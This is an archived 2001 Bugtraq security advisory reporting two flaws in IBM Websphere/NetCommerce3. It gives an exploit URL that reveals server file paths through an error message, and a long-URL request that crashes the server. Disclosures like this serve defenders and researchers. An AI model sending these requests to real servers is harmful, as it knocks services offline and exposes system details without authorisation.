[20188] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[LoWNOISE] IBM Websphere/NetCommerce3 DoS and one more.

daemon@ATHENA.MIT.EDU (ET LoWNOISE)
Fri Apr 13 02:30:43 2001

MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-ID:  <Pine.SUN.3.96.1010413001134.6295A-100000@grex.cyberspace.org>
Date:         Fri, 13 Apr 2001 00:28:48 -0400
Reply-To: ET LoWNOISE <et@CYBERSPACE.ORG>
From: ET LoWNOISE <et@CYBERSPACE.ORG>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To:  <5.0.2.1.2.20010409000933.00b69eb8@mail.shagpoint.org>

PRODUCT:  IBM Websphere/NetCommerce3
vERSION:  3.1.2 , posibly others (Unix, and NT)

+PATH REVEALING PROBLEM
Exploit:

http://host/cgi-bin/ncommerce3/ExecMacro/macro.d2w/NOEXISTINGHTMLBLOCK

Result:

DTWP029E: Net.Data is unable to locate the HTML block NOEXISTINGHTMLBLOCK
 in file /usr/NetCommerce3/macros/en_US/macro.d2w

+DoS with Long URL
Exploit:

http://host/cgi-bin/ncommerce3/ExecMacro/macro.d2w/%0a%0a..(aprox 1000)..%0a

On UNIX and NT Netcommerce will crash:
  Server Not Responding

[-----------------------------------------------------------------------]

Efrain 'ET' Torres
et@cyberspace.org
[LoWNOISE] Colombia 2001


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[20188] in bugtraq

[LoWNOISE] IBM Websphere/NetCommerce3 DoS and one more.

daemon@ATHENA.MIT.EDU (ET LoWNOISE)Fri Apr 13 02:30:43 2001

daemon@ATHENA.MIT.EDU (ET LoWNOISE)
Fri Apr 13 02:30:43 2001